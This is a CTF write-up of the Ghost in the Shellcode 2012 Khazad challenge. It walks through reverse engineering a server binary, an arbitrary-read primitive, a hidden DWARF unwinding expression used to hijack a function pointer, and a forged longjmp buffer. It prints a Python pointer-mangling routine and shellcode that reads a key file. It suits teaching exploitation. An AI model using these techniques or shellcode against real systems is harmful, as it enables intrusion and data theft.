Update: The Eindbazen did a nice write-up after solving the challenge post-mortem: they call functions iteratively with the code execution primitive instead of pivoting to a ROP chain with longjmp, seems a lot easier!
Ghost in the Shellcode CTF 2012 was pretty chaotic and a lot of challenges were broken, stupid guessing around or otherwise frustrating. Nevertheless, I had a lot of fun with the Khazad challenge (which also supposedly was the hardest, at least it was worth the most points).
The challenge came as a ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, stripped and with the information on which host, this binary would be running. Typically, you'd have to get code execution on that machine using a memory corruption bug in the binary at hand. I threw the binary into IDA Pro and started reverse engineering it.
As all the pwn challenge binaries, this binary basically was a forking server, where the main accept loop utility function invokes a parameter function pointer with the client fd as only parameter. Coincidentially, this code looks a lot like the DefCon CTF boiler plate code. Since this 64bit version of it did look like all the 32bit utility code around the actual client handling, I will omit it here.
The client handler first initializes a jmpbuf structure using setjmp; the code taken when upon longjmp will print clean up some heap memory and then return (effectively terminating the connection). This jump is actually taken from the SIGALARM handler installed later. The cleanup code loops over the pointer like over a linked list.
mov edi, offset jmpbuf ; env
mov rax, fs:28h
mov [rsp+1C8h+var_40], rax
xor eax, eax
call __setjmp
test eax, eax
jz short loc_401E00
mov rdi, cs:ptr ; ptr
test rdi, rdi
jz short loc_401DD4
jmp short loc_401DB8
; ---------------------------------------------------------------------------
align 8
loc_401DB8: ; CODE XREF: client_handler_0+42j
; client_handler_0+62aj
mov rax, [rdi+18h]
mov cs:ptr, rax
call _free
mov rdi, cs:ptr
test rdi, rdi
jnz short loc_401DB8
loc_401DD4: ; CODE XREF: client_handler_0+40j
When not returning from the longjmp (and therefore in the normal program flow), the code would then read two 64bit integer values from /dev/urandom into two separate global variables. It initalizes a global ptr, that is also freed in the cleanup code, with zero and a global boolean with true (this value indicates whether to continue receiving input).
mov cs:ptr, 0
mov cs:continue_flag, 1
Then -- in a loop and for each iteration -- the code requires you to send four 64bit integers as input. The second integer read in must be a certain magic number (note that [rsp+1C8h+magic_deadbeef] and rbx are aliased here):
mov edi, [rsp+1C8h+fd] ; fd
mov edx, 8 ; n
mov rsi, rbp ; buf
call readAll
mov edi, [rsp+1C8h+fd] ; fd
mov edx, 8 ; n
mov rsi, rbx ; buf
call readAll
mov rax, 0DEAD1337BEEFh
cmp [rsp+1C8h+magic_deadbeef], rax
jnz short loc_401E70
mov edi, [rsp+1C8h+fd] ; fd
mov edx, 8 ; n
mov rsi, r15 ; buf
call readAll
mov edi, [rsp+1C8h+fd] ; fd
mov edx, 8 ; n
mov rsi, r14 ; buf
call readAll
The code then compares the first integer ([rsp+1C8h+function_id] and rbp are again aliased) with a set of four function pointers. If it matches one of those, it calls the input as a function pointer. Therefore we can reach only one of the four pre-defined addresses. The third and fourth integers sent are passed as first and second function parameters.
mov rax, [rsp+1C8h+function_id]
test rax, rax
jz loc_401FB0
cmp rax, cs:func1
mov r12, rax
jz loc_401F90
cmp rax, cs:func2
jz short loc_401F90
cmp rax, cs:func3
jz short loc_401F90
xor r12d, r12d
cmp rax, cs:func4
jz short loc_401F85
; ...
loc_401F85: ; CODE XREF: client_handler_0+1B7j
mov r12, rax
jmp short loc_401F90
; ---------------------------------------------------------------------------
align 10h
loc_401F90: ; CODE XREF: client_handler_0+195j
; client_handler_0+1A2j ...
mov edx, [rsp+1C8h+fd]
mov rsi, [rsp+1C8h+param_2]
mov rdi, [rsp+1C8h+param_1]
call r12
Not depicted in the listing above is that the code throws a C++ exception (a std::string describing the error) if the function pointer is not in the predefined set. The whole input handling code is enclosed in a try-catch block that will print the exception string to the client and then read input again in the next loop iteration.
Next, I've examined the four functions available. The references are conveniently stored after each other in the binary. Since they are in .data and receive user input as parameters, I made notice of them as potential overwriting candidates later.
.data:00000000006031A0 func1 dq offset sub_401B70 ; DATA XREF: client_handler_0+18Br .data:00000000006031A8 func2 dq offset sub_402170 ; DATA XREF: client_handler_0+19Br .data:00000000006031B0 func3 dq offset sub_401980 ; DATA XREF: client_handler_0+1A4r .data:00000000006031B8 func4 dq offset sub_401C70 ; DATA XREF: client_handler_0+1B0r
These functions implement a heap linked-list based data storage:
- The second function lets you store an arbitrary data blob of up to
63hbytes of data on the heap. It links this heap into the global linked list referenced bycs:ptrearlier. It writes back an identifying return value to the client: the pointer after the linked list header, containing your data. Besides a forward and backward pointer, the linked list header also contains the two/dev/urandomcookies initalized earlier (one raw as 64bit integer and the other onexor'ed against the buffer address). The heap allocations here look safe, no signedness isuess and so on. - The first function lets you read out a data item based on it's identifier and the length you specify when calling it. Since the identifier is a pointer and the function does not check, if the linked list actually contains such an item, you can read arbitrary memory with this function. A quite useful primitive that will come in handy later... ;)
- The third function unlinks an element from the linked list, again by identifier. Unfortunately, this one does check for presence in the linked list and only invokes free on valid blocks there.
- The last function sets the
cs:continue_flagif the first parameter is zero, effectively terminating the connection.
All of those functions check various error conditions and throw a std::string exception. This is handled in the calling function as described earlier.
At this point, I was confused about the safe invocations of malloc and free and hence I tried to dig very deep into list linking and unlinking as I was suspecting a bug there. I did not find a bug, even after about two hours. I imagine, this is where a lot of people gave up.
Fortunately at this point, I googled the name of the challenge, it let me to Wikipedia article. When I read the title "Dwarf (Middle-earth)", it immeditely struck me. The code uses C++ exceptions quite extensively and I knew that the standard describing debug information and exception unwinding information for ELF binaries was DWARF.
A quick $ readelf --debug-dump=frames 5faa7969ec6113e73f002c861f5b1229 revealed some interesting exception unwinding specifications for quite some functions (if you don't know, how all this relates, ask the Internet). Most of those functions contained some evaluation of DWARF code to restore a register value:
DW_CFA_val_expression: r0 (rax) (DW_OP_skip: 19; DW_OP_dup; DW_OP_lit21; DW_OP_shl; DW_OP_swap; DW_OP_const1u: 43; DW_OP_shr; DW_OP_or; DW_OP_constu: 466682695468; DW_OP_dup; DW_OP_skip: 81)
Unfortunately, the static DWARF disassembler in stock binutils does not follow the unconditional DW_OP_skip branches. I've quickly built my own, patched readelf and most of the register expressions simply contain a skip to the end of the expression. There was one expression that stood out (both in length and register not being rax this time):
00000280 0000002c 000000d4 FDE cie=000001b0 pc=00401c70..00401d70 Augmentation data: cc 2b 40 00 DW_CFA_def_cfa_offset: 64 DW_CFA_offset: r6 (rbp) at cfa-32 DW_CFA_offset: r12 (r12) at cfa-24 DW_CFA_offset: r13 (r13) at cfa-16 DW_CFA_offset: r3 (rbx) at cfa-40 DW_CFA_val_expression: r12 (r12) (DW_OP_reg3 (rbx); DW_OP_const8u: 1651338292 1683508844; DW_OP_xor; DW_OP_skip: -595; DW_OP_dup; DW_OP_lit21; DW_OP_shl; DW_OP_swap; DW_OP_const1u: 43; DW_OP_shr; DW_OP_or; DW_OP_constu: 466682695468; DW_OP_dup; DW_OP_skip: 81; DW_OP_rot; DW_OP_plus; DW_OP_dup; DW_OP_lit15; DW_OP_shl; DW_OP_swap; DW_OP_const1u: 49; DW_OP_shr; DW_OP_or; DW_OP_plus; DW_OP_skip: -62; DW_OP_const8u: 4294967295 4294938623; DW_OP_and; DW_OP_skip: 572;
Looking at the program counter value, this exception unwinding information was defined for, I saw this was for the fourth function, which throws an exception if the first parameter is not zero. Furthermore, when the exception has been caught, r12 is preserved throughout the next loop iteration, where r12 is then used to read the function pointer to call into. Fortunately, we can skip this by sending a zero function pointer. Then r12 is not loaded again but assumed to be still zero. However, the next basic block then just checks if r12 is zero, and if not, invokes it! So by passing a magic value as first parameter (which is what is in rbx when the exception gets thrown) to the exit function and then invoking a zero function, we can actually call an arbitrary function pointer.
Since I did not know any better, I quickly took pen and paper and reversed the stack machine instructions to a formula by hand:
The inverse function in python then looked like this:
C1 = 0x64584e6c626d6c34L
C2 = 466682695468L
def rol(num, bits):
return ((num << bits) & 0xffffffffffffffff) | ((num >> (64 - bits)) & 0xffffffffffffffff)
def mangle(target):
target |= 0x7000<<32
target -= C2
target = rol(target, 49)
target -= C2
target = rol(target, 43)
target ^= C1
return target
And indeed, this let me execute a jump to 0xdeadbeef, controlling the first two parameters.
Now I could jump anywhere I want inside a ASLR'ed, NX'ed executable. Not exactly helpful just yet, even with my arbitrary memory read and constrained write primitives.
Therefore, I was planning on some simple return2libc and execute system, since I could also control it's parameter through rdi. Therefore, I dumped the remote PLT using the memory read primitive and tried to find out which libc binary this was using the delta between several functions. Long story short, I did not have such a binary at hand.
But I could read arbitrary memory, so I dumped the entire libc pages from a function pointer back to its ELF header. Unfortunately, none of the ELF tools I know can work on loaded and already dynamically linked memory dumps. So I quickly hacked up my own ELF parser that could resolve functions for me from this dump (which took about almost an hour by itself, it was pretty late already). To my surprise, this technique worked quite fine:
[7950h] st_name: system [7950h] st_value: 41AD0h [7950h] st_shndx: Ch
When I tried this locally, I suddenly realized that both my local and the remote libc addresses had bits that were masked out by the last DW_OP_and. So they did not want me to simply return2libc, another point where the organizer just added arbitrary frustration... :/
Unfortunately, I could not control much on the stack and did not find a suitable pivot gadget switching the stack to a controlled register either.
But I knew this binary was using longjmp. Since I knew, how longjmp works, I wanted to abuse it: setjmp just saves some register contents, the stack pointer and the calling functions address (from the stack) into a buffer. So I could fake such a buffer with the write primitive and pass this as first parameter to the exit function, later jumping to longjmp and thereby controlling both the stack pointer and the instruction pointer. Or so I thought: as a protection mechanism, glibc these days mangles sensitive pointers (such as the address to jump to) by XOR'ing them against a value in fs and rotating it by 17 bits (whatever that protection is supposed to be good for). Additionally, it contains a sanity check that the new stack pointer is not below the old stack pointer.
I could not determine the position of the fs segment remotely, but the original jmpbuf was stored at a fixed location and I could leak it. By XOR'ing the return address there with the correct return address (derived from the binary at hand), I could restore the cookie and thereby also fake a jmpbuf.
So I modified my exploit to jump to system through longjmp and pass as first parameter a command buffer I had allocated using the second function before. This worked great (with modified offsets) locally, but when I tried this remotely, I did not have any success (believe me, I've tried with tons of commands to just send any sign of life to any fd or via netcat...). Those bastards must have not have any shell in that chroot or whatever! Another stupid frustration factor, I already spent 10 hours on this and it was 6 a.m. in my timezone.
Eventually, I resorted to invoking mprotect on some heap memory, where I had put a custom shellcode and then jump to that shellcode:
libc equ 0x7fdfb4253000
write equ 0xD84F0
getcwd equ 0xD8EC0
exit equ 0x39180
open equ 0xD8120
read equ 0xD8490
mov rsp, rbp
;mov rdi, rsp
;push 0x80
;pop rsi
;mov rax, libc+getcwd
;call rax
lea rdi, [rel filename]
xor rsi, rsi
mov rax, libc+open
call rax
mov rdi, rax
mov rsi, rsp
push 0x100
pop rdx
mov rax, libc+read
call rax
push 4
pop rdi
mov rsi, rsp
push 0x100
pop rdx
mov rax, libc+write
jmp rax
xor rdi, rdi
mov rax, libc+exit
jmp rax
filename:
db 'key', 0
This was my first 64bit shellcode for Linux and since I was too lazy to look up the calling conventions and I already could determine libc symbol addresses, I just called into libc directly. This was also the first time, I had the joy of using PC relative addressing in shellcode. ;)
At 8 a.m. in the morning and after twelve hours of fiddling with this totally fucked up challenge, I had received the key. Thanks for this truly amazing challenge!
If you liked this write-up, feel free to retweet a link to it.
